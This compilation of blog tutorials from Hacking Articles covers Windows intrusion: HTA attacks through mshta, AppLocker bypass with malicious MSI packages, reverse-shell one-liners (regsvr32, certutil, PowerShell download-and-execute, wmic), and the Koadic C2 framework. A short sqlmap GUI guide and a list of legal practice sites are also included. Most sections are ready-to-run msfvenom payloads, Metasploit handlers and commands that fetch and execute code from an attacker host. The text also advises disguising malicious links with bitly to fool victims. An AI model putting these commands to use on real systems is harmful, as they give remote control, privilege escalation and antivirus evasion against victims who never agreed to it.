Our method for HTA attack is through setoolkit. For this, open setoolkit in your kali. And from the menu given choose the first option by typing 1 to access social engineering tools.

From the next given menu, choose second option by typing 2 to go into website attack vendors.

From the further given menu choose option 8 to select HTA attack method.

Once you have selected the option 8 for HTA attack, next you need to select option 2 which will allow you to clone a site. Once selected the option 2, it will ask the URL of the site you want to clone. Provide the desired URL as here we have given ‘www.ignitetechnologies.in’.

After giving the URL it will ask you to select the type of meterpreter you want. Select the third one by typing 3.

Once you hit enter after typing 3, the process will start and you will have the handler (multi/handler)

Now convert your malicious IP into bitly link which will appear more genuine to victims when you will share this link with them.

When the victim will browse above malicious link, the file will be saved and automatically executed in the victim’s PC after being saved; as shown in the image below:

Then you will have your meterpreter session. You can use the command ‘sysinfo’ to have the basic information about the victim’s PC.

Magic Unicorn

Next method for HTA attack is using unicorn third party tool. The tool magic unicorn is developed by Dave Kennedy. It is a user friendly tool which allows us to perform HTA attack by injecting shellcode straight into memory. The best part of this tool is that it’s compatible with Metasploit, along with shellcode and cobalt strike. You can have detailed look of the software at: trustedsec.com, and you can download the software from github or just by using this link: https://github.com/trustedsec/unicorn

Once you have downloaded magic unicorn. Open it in the terminal of kali and type:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta

Executing the above command will start the process to create an .hta file. The said .hta file wil be created in a folder hta-attack/. Go into that folder and see the list of files created by typing following commands :

cd hta_attack/
ls

Now you will be able to see an .hta file i.e. Launcher.hta. Start the python server so the file can be shared. To do so, type :

python -m SimpleHTTPServer 80

Once the server is up and running execute the following command in the cmd prompt of the victim’s PC :

mshta.exe http://192.168.1.109/Launcher.hta

When the above command will be executed, you will have your session activated in the multi/handler. To access the session, type :

sessions 1

MSFVenom

The next method of HTA attack is by manually creating an .hta file through msfvenom. Create a .hta file, type the following command in the terminal of kali:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta

Executing the above command will create an .hta file which you can use to your advantage. After creating the file, turn on python server to share the file to victim’s PC by typing:

python -m SimpleHTTPServer 80

Run the above file by typing:

mshta.exe http:192.168.1.109/shell.hta

Simultaneously, start your handler to receive a session when you run the above file in the victim’s cmd prompt. To start multi/handler type:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

And so, with using such easy method, you will have you session of meterpreter. You can use sysinfo to know them basics of the victim’s PC.

PowerShell Empire

For our next method of HTA Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our hta tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

uselistner http
set Host http://192.168.1.109
set port 80
execute

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our HTA attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/hta
set listener http
set OutFile /root/Desktop/1.hta
execute

Usestager will create a malicious code file that will be saved in the outfile named 1.hta. And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command :

mshta.exe http://192.168.1.109/1.hta

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

interact L924Z1WR

The above command will give you the access to the session.

sysinfo
info

Cactustorch

Cactustorch is framework for javescript and vbscript shellcode launcher. It is developed by Vincent Yiu. This tool can bypass many common defences which is an advantage for us till now. The major to thing to note is that the code we use in cactustorch is made through msfvenom and then encoded into Base64 as it only supports that.

So, to start with let’s first make our malware and then encrypt it.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport1234 -f raw >1.bin

Now to encrypt the file type:

cat 1.bin |base64 -w 0

Copy the base64 code as it is to be used later.

Now that we have our malware ready, let’s download cactustorch. You can download it from here:

https://github.com/mdsecactivebreach/CACTUSTORCH

Once it’s installed type the following to the content of the folder installed:

ls -lsa
./CACTUSTORCH.hta

The above command will start cactustorch for hta attack.

Once the cactustorch starts, paste the base64 code, at the highlighted space as shown in image below, which was copied earlier.

As we have added our code, let’s execute the file in our vicitim’s PC by typing:

mshta.exe http://192.168.1.109/CACTUSTORCH.hta

Simultaneously, start your multi/handler to receive a session. For multi/handler type:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Once you execute the file in victim’s PC, you will have your session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link:  https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type info to get gist of details you need to provide in order to have session. Through info you know that you need to provide srvhost along with setting endpoint. So to set them type :

set srvhost 192.168.1.107
set ENDPOINT sales
run

Execute you’re the file in your victim’s PC by typing:

http://192.168.1.107:9999/sales

And you will have a session up and running. To know the name of session type:

zombies

And now to access the session type:

zombies 0

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

use Bypass

Now to see the list of payloads type :

list

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use mshta/shellcode_inject/base64_migrate.py

Once the command is execute, type :

generate

After executing generate command, it asks you which method you want to use. As we are going to use msfvenom type 1 to choose first option. Then press enter for meterpreter. Then provide lhost and lport i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. As I didn’t wanted to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the hta file in the command prompt of the victim’s PC.

Simultaneously, start the multi/handler using recourse file. For this, type :

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Conclusion

So basically, this type of attack is a simple HTA attack provide full access to the remote attacker. An attacker can create a malicious application for the Windows operating system using web technologies to clone a site. In a nutshell, it performs PowerShell injection through HTA files which can be used for Windows-based powershell exploitation through the browser. And the above are the methods used for the attack. As they say, if one door closes another open; therefore when same attack is learnt through different ways are often convenient.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass Application Whitelisting using mshta.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using msiexec.exe (Multiple Methods)

In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But Today you will learn how to bypass Applocker policies. In this post, we have block cmd.exe file using Windows applocker Policy and try to bypass this restriction to get command prompt as administrator.

Table of Content

Associated file formats where Applocker is applicable

Challenge 1: – Bypass Applocker with .msi file to get CMD

Little-Bit more about MSI file

Multiple Methods to get CMD

  • Generate malicious .msi file with Msfvenom -1st Method
  • Generate malicious .msi file with Msfvenom -2nd Method
  • Generate malicious .msi file with Msfvenom -3rd Method

Challenge 2: – Make a local user member of Administrative Group

  • Generate Malicious .msi file with Msfvenom -4th Method

Associated file formats where Applocker is Applicable

Windows applocker is a function that was introduced in home windows 7 and windows server 2008 r2 as a method to restrict the usage of unwanted Programs. In this an administrator can restict the execution of the  following programs:

It depends entirely on the system admin which program or script he wants to set the applocker policy for program restriction or execution. There could a situation where Command Prompt (cmd.exe), or Powershell or dll file or batch file or rundll32.exe or regsrv.32 or regasm and many more are blocked.

Challenge 1: – Bypass Applocker with .msi file to get CMD

Let’s suppose you are in a similar situation where all the above mentioned application is blocked and only Windows Installer file i.e. the.msi extension is allowed to run without any restrictions.

Then how will you use an msi file to bypass these restriction and get a full privilege shell?

Little-Bit more about MSI file

The MSI name comes from the original title of the program, Microsoft Installer. Since then the name has changed to Windows Installer. An .MSI file extension file is a Windows Package Installer. An installation package contains all the information required to install or uninstall an application by Windows Installer.Each installation package contains a .msi file, which contains an installation database, a summary information stream and data streams for different parts of the installation.

The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.

The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.

When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.

Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.

Multiple Methods to get CMD

Generate Malicious .msi file with Msfvenom -1st Method

Now let’s open a new terminal in Kali machine and generate a malicious MSI Package file as cmd.msi to get command prompt through it by utilizing the Windows/exec payload as follows:

msfvenom -p Windows/exec CMD=cmd.exe -f msi > cmd.msi
python -m HTTPServer 80

Now transfer cmd.msi file in your Windows machine to obtain the command prompt shell as administrators.  Here we have used Python HTTP server for sharing file in the network.

Once you have downloaded the.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /quiet /i <path of downloaded .msi file>

msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi

As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt.

 

Generate Malicious .msi file with Msfvenom -2nd  Method

Note: Even if you rename cmd.msi file in another extension, it will bypass the rule and start a command prompt as an administrator.

Repeat above to generate an msi file with the same payload as msfvenom and named cmd.png. Since I already have a cmd.msi file in my kali, I rename it as cmd.png and use a python server to transfer it.

Once you have downloaded the cmd.png file (which is actually an .msi file) on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /q /i <path of downloaded .msi file>

msiexec /q /i http://192.168.1.107/cmd.png

As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt .

Generate Malicious .msi file with Msfvenom -3rd  Method

In above methods, we obtain a command prompt by utilizing the Windows/exec payload but now we will use windows/meterpreter/reverse_tcp payload to get full privilege command shell via meterpreter sessions.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 –f  msi >  shell.msi

Now again transfer shell.msi file in your Windows machine to obtain the command prompt shell as administrators and start multi/handler.  Here we have used Python HTTP server for sharing file in the network.

Once you have downloaded the shell.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /q /i <path of downloaded .msi file>

msiexec /q /i http://192.168.1.107/shell.msi

As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt as administrator via the meterpreter session using this exploit!!  

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.107
msf exploit(handler) > set lport 1234
msf exploit(handler) > exploit
meterpreter > shell

Challenge 2: – Make a local user member of Administrators Group

Let’s suppose you are in a similar situation where all the above mentioned application is blocked and only Windows Installer file i.e. the.msi extension is allowed to run without any restrictions.

Then how will you use an msi file to bypass these restriction to make a local user member of Administrators Group where cmd.exe is block?

Note: Here aaru is a local user account which is not non-administrative user account as shown below:

As we know that due to applocker execution rule policy, cmd.exe is block on the local machine, therefore we cannot use command prompt to add aaru in the administrator group.

Generate Malicious .msi file with Msfvenom -4th  Method

Generate a MSI package as admin.msi with the windows/exec payload that sends a command instructing to add local admin privileges for the user “aaru”, to the target machine.

msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi

Now transfer admin.msi file in your Windows machine to add aaru in the administrators group.  Here we have used Python HTTP server for sharing file in the network.

Once you have downloaded the admin.msi file your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /q /i <path of downloaded .msi file>

msiexec /q /i http://192.168.1.107/admin.msi

As soon as you will hit the above mentioned command inside run prompt, you can ensure that the aaru user has become part of administrators account.

Hopefully, it becomes clear to you, that, how you can use an .msi file to compromise an operating system where cmd.exe and other applications are blocked by administrator.

References:

https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Bypass Application Whitelisting using msiexec.exe (Multiple Methods) appeared first on Hacking Articles.

Get Reverse-shell via Windows one-liner

This article will help those who play with CTF challenges, because today we will discuss “Windows One- Liner” to use malicious commands such as power shell or rundll32 to get reverse shell of the Windows system. Generally, while abusing HTTP services or other programs, we get RCE vulnerability. This loophole allows you to remotely execute any system command. We have therefore prepared a list of Windows commands that enable you to use the target machine to get reverse connections.

Table of Content

Mshta.exe

  • Launch HTA attack via HTA Web Server of Metasploit

Rundll32.exe

  • Launch Rundll32 Attack via SMB Delivery of Metasploit

Regsvr32.exe

  • Launch Regsvr32 via Script Web Delivery of Metasploit

Certutil.exe

  • Launch MSbuild Attack via Msfvenom C# shellcode

Powershell.exe

  • Launch Powercat attack via Powershell
  • Launch cscript.exe via Powershell
  • Launch Batch File Attack via Powershell

Msiexec.exe

  • Launch msiexec attack via msfvenom

Wmic.exe

  • Launch Wmic.exe attack via Koadic

Mshta.exe

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with. You can interpret these files using the Microsoft MSHTA.exe tool.

Metasploit contain “HTA Web Server” module which generate malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed.

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Now run the malicious code through mshta.exe on the victim’s machine (vulnerable to RCE) to obtain meterpreter sessions.

Once you will execute the malicious hta file on the remote machine with the help of mshta.exe, you get reverse connection at your local machine (Kali Linux).

mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta

As you can observe that, we have meterpreter session of the victim as shown below:

Rundll32.exe

Rundll32.exe is associated with Windows Operating System that allow you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.

Launch Rundll32 Attack via SMB Delivery of Metasploit

Metasploit also contain “SMB Delivery” module which generate malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain meterpreter sessions.

Once you will execute the dll file on remote machine with the help of rundll32.exe, you will get reverse connection at your local machine (Kali Linux).

rundll3.exe \\192.168.1.109\vabFG\test.dll,0

As you can observe that, we have meterpreter session of the victim as shown below:

Regsvr32.exe

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Launch Regsvr32 via Script Web Delivery of Metasploit

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Once you will execute the scrobj.dll file on remote machine with the help of regsrv32.exe, you will get reverse connection at your local machine (Kali Linux).

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xt5dIF.sct scrobj.dll

As you can observe that, we have meterpreter session of the victim as shown below:

Certutil.exe

Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file in the target machine to get meterpreter session.

Launch certutil Attack via Msfvenom

Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get reverser shell of victim’s machine.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

 

Now, in order to dump configuration information or files of shell.exe file with certutil, you can follow below systax:

Syntax: [-f] [-urlcache] [-split] Path of executable file

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Powershell.exe

You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more from official website of Microsoft Windows from here.

Launch Powercat attack via Powershell

Powercat is a PowerShell native backdoor listener and reverse shell also known as modify version of netcat because it has integrated support for the generation of encoded payloads, which msfvenom would do and also has a client- to- client relay, a term for Powercat client that allows two separate listeners to be connected.

Download powershell in your local machine and then the powercat.ps1 transfer files with python http server to obtain reverse shell of the target as shown below and start netcat listener.

git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

Then execute following command on remote side to get natcat session.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

As you can observe that, we have netcat session of the victim as shown below:

Batch File

Similarly, powershell allows client to execute bat file, therefore let’s generate malicious bat file with msfvenom as given below and start netcat listener.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Then execute following command on remote side to get natcat session.

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))

As you can observe that, we have netcat session of the victim as shown below:

Cscript

Similarly, powershell allows client to execute cscript.exe to run wsf, js and vbs script, therefore let’s generate malicious bat file with msfvenom as given below and start multi/handler as listener.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

Then execute following command on remote side to get meterpreter session.

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Msiexec.exe

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.  

Launch msiexec attack via msfvenom

Let’s generate a MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as listener.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f  msi > 1.msi

Once you will execute the 1.msi file on remote machine with the help of msiexec, you will get reverse connection at your local machine (Kali Linux).

msiexec /q /i http://192.168.1.109/1.msi

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Wmic.exe

The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language).

Launch Wmic.exe attack via Koadic

Now will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire.

To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation gets completed, you can run ./koadic file to start koadic and start with loading the sta/js/wmic stager by running the following command and set SRVHOST where the stager should call home.

use stager/js/wmic
set SRVHOST 192.168.1.107
run

Execute WMIC following command to download and run the malicious XSL file from a remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file will get executed on target machine, you will have a Zombie connection just like metasploit.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Get Reverse-shell via Windows one-liner appeared first on Hacking Articles.

Configure Sqlmap for WEB-GUI in Kali Linux

Hello everyone and welcome to this tutorial of setting up SQLMAP for web-gui. Web-GUI simply refers to the interface that a browser provides you over the http/https service.

SQLMAP is a popular tool for performing SQL injection attacks on sites affected by mysql errors; be it an error based sql injection or hidden sql, sqlmap is the biggest tool there is for SQL injection attacks. But very few people know that sqlmap also provides an API for it’s service that is written in python that we can use to develop a front end for the same sqlmap which is on command line interface.

One such person is Hood3dRob1n(https://github.com/Hood3dRob1n/SQLMAP-Web-GUI) who has created a PHP based front end for sqlmap and today, we’ll be setting it up in Kali Linux. It is needless to say, it will be compatible with any Linux distro.

Let’s get started.

Table of Contents:

  1. Cloning the github repository and giving necessary permissions
  2. Locating and hosting the API
  3. Launching the front end
  4. Attacking practice lab for SQLi

Cloning the github repository

First, we need to clone the Hood3dRob1n repository. To clone, we’ll use the git clone command and put the folder named sqlmap inside “/var/www/html.”

git clone https://github.com/Hood3dRob1n/SQLMAP-Web-GUI
cd SQLMAP-Web-GUI
mv sqlmap ..
cd ..
chmod 777 sqlmap

 

Locating and hosting the API

The next step is to host an apache server. If you don’t have apache pre installed, you can install it with apt-get install apache2 command.

After we have hosted the Apache server, we need to run the sqlmapapi.

The default folder would vary with multiple linux distros, so we used the locate command to locate the file named “sqlmapapi.py

We need to run this API using the command:

python usr/share/sqlmapapi.py -s

Launching the front end

If you have followed this tutorial so far, you’ll see the following screen when you open localhost/sqlmap

And voila! Just like that you are good to start injecting SQL queries.

Attacking practice lab for SQLi

There are 6 tabs essentially here.

  • BASIC: This tab allows you to set the URL to test SQL injections. You can set HTTP method too. Given options are POST, PUT, HEAD etc.
  • REQUEST: Allows you to modify your request with optional parameters like time delay, timeout between requests, no. of retries to connect, user agent etc.
  • INJECTION & TECHNIQUE: Lets you choose which kind of injection and techniques you are applying– Boolean based, error based, inline etc. as well as other options like use of DBMS hex functions for data retrieval, kind of database (MYSQL or MSSQL) and so on.
  • DETECTION: To set a custom string to match.
  • ENUMERATION: What data to retrieve. Eg: current user and current database dump. Or if you are feeling fancy, all users all data dump. You can play around with it.
  • ACCESS: Access parameters. Leave this at default if you don’t know your way around it.

We will set the parameters one by one as we proceed. But we never attack on live websites, hence, we used another PC with an IP address of 192.168.1.105 to host a practice lab for SQL injection attacks called SQL-Dhakkan. Refer to this article to know how you can set it up yourself!

If you are successful to set up the lab, you’ll get a screen something like this:

I am on Lesson 1 currently and I know that id=1 has an error based SQLi vulnerability. So, let’s copy this URL to our web-gui sqlmap.

It is highly recommended that you get yourself familiar with HTTP methods and read how to manually attack SQLi here because it will give you a profound idea of the options we will be selecting further in the tutorial. But if you wish to continue with the tutorial instead, who am I to stop you!

Go to the enumeration tab and select the methods that you want to test.

Once set, set the type of SQLi you want to perform.

Once you are satisfied with the choices you input, run the scan!

For the purpose of this tutorial we have performed a really basic scan that tells us the current database and hostname, but you can play around with the parameters as you like.

Conclusion: Web based GUI for sqlmap is definitely a plus point over the traditional sqlmap for many reasons, one of them being the ease of access. There is no need to remember such long commands. Drag, drop and done!

Plus, web-based GUI is nothing but a web app for you. A web app that runs sqlmap, isn’t it great?

Hope you enjoyed this little tutorial.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

The post Configure Sqlmap for WEB-GUI in Kali Linux appeared first on Hacking Articles.

20+ Free Resources To Legally Practice Your Ethical Hacking Skills

There’s no better way to gaining confidence in your ethical hacking skills than by actually practicing them in real-life. So, where can one do that? We searched the web for solutions, and here are the top free resources we found.

  1. Hack.me hosts a number of vulnerable apps and allows its community to build, host and share their vulnerable application code for educational and research purposes. 

  2. Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests.
  3. Hack This Site is more than just another hacker wargames site, it’s a living, breathing community with many active projects in development.
  4. Try2Hack provides several security oriented challenges for your entertainment.
  5. HackThis  is a legal and safe network security resource where users test their hacking skills on various challenges and learn more about hacking.
  6. CTF365 allows you to defend your servers and launch attacks on others, all using the exact same techniques that work in the real world.
  7. OverTheWire helps you learn and practice security concepts in the form of fun-filled games.
  8. Hacking-Lab  is providing CTF and mission style challenges for international competitions, like the European Cyber Security Challenge.
  9. Pwnable.kr is a non-commercial wargame site which provides various pwn challenges regarding system exploitation.
  10. SmashTheStack is a wargaming Network hosting several wargames.
  11. IO is a wargaming community with several free wargames available.
  12. Microcorruption is an embedded security CTF where you have to reverse engineer fictional Lockitall electronic lock devices.
  13. W3Challs  is a penetration testing platform, which offers various computer challenges, in categories related to security: Hacking, Cracking, Wargame, Forensic, Cryptography, Steganography and Programming.
  14. PWN0 is the VPN where (almost) anything goes, that allows you to go up against pwn0bots or other users and score points by gaining root on other systems.
  15. Hellbound Hackers is a completely legal, web-based security training ground, offering challenges that teach you how computer based exploits work.
  16. Damn Vulnerable iOS App (DVIA) provides a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills in a legal environment.

  17. Root Me allows you to practice your ethical hacking skills across a variety of scenarios.
  18. CTFtime  is great resource to stay up-to-date on CTF events happening around the globe.
  19. WebGoat is an insecure app available for Windows, OS X Tiger and Linux and also runs in Java and .NET environments.
  20. Juice Shop  is an insecure web application based on JavaScript for anyone that’s into coding or testing JavaScript but don’t understand the security issues that can arise. 

  21. Hackademic is an OWASP open-source project and offers 10 realistic scenarios which are full of vulnerabilities

  22. Hackxor  is a web app hacking game focusing on cross-site scripting, cross-site request forgery and SQL injection vulnerabilities. 

  23. BodgeIt Store  is a vulnerable web application which is currently aimed at people who are new to pen testing.
  24. EnigmaGroup is designed for anyone that wishes to improve their security knowledge and hosts a wide variety of vulnerabilities

  25. Google Gruyere is designed for the absolute beginner to learn how hackers find security vulnerabilities, how they exploit web applications and how to protect applications from being exploited.

Tools to legally practice your ethical hacking skills are not what’s missing on the web, and some really good ones are even free to use. Let us know if you’ve tried some other good ones and think they’d be a great addition to this list. 😉 

Want to learn modern security testing skills? Discover our Penetration Testing Professional (PTP) and Web Application Penetration Testing (WAPT) training courses today:
DISCOVER PTP  |   DISCOVER WAPT

Sources: WheresMyKeyboard?Bonkers about Tech, Checkmarx

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Koadic – COM Command & Control Framework

Hello friends!! In this article we are introducing another most interesting tool “KOADIC – COM Command & Control” tool which is quite similar to Metasploit and Powershell Empire. So let’s began with its tutorial and check its functionality.

Table of Content

  • Introduction to Koadic
  • Installation of Koadic
  • Usage of Koaidc
  • Koadic Stagers
  • Privilege Escalation with Koadic Implants
  • Post Exploitation
    • Generate Fake Login Prompt
    • Enable Rdesktop
    • Inject Mimikatz
    • Execute Command
    • Obtain Meterprter Session from Zombie Session

Introduction to Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

Source – https://github.com/zerosum0x0/koadic

Installation of Koadic

It must first be downloaded and installed in order to start using Koadic. Run following command to download Koadic from github and also take care of its dependency tools while installing koadic.

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

apt-get install python3-pip
pip3 install -r requirements.txt
./koadic

Usage of Koaidc

This tool is majorly depends upon stager and implant. It contains 6 stager and 41 implant

Stager: Stagers hook target zombies and allow you to use implants.

Implants: Implants start jobs on zombies.

Once installation gets completed, you can run ./koadic file to start koadic. Then run the most helpful command to get synopsis of the use of koadic is help. The help command summarizes the various commands available. Koadic functions similar to other frameworks, such as Metasploit.

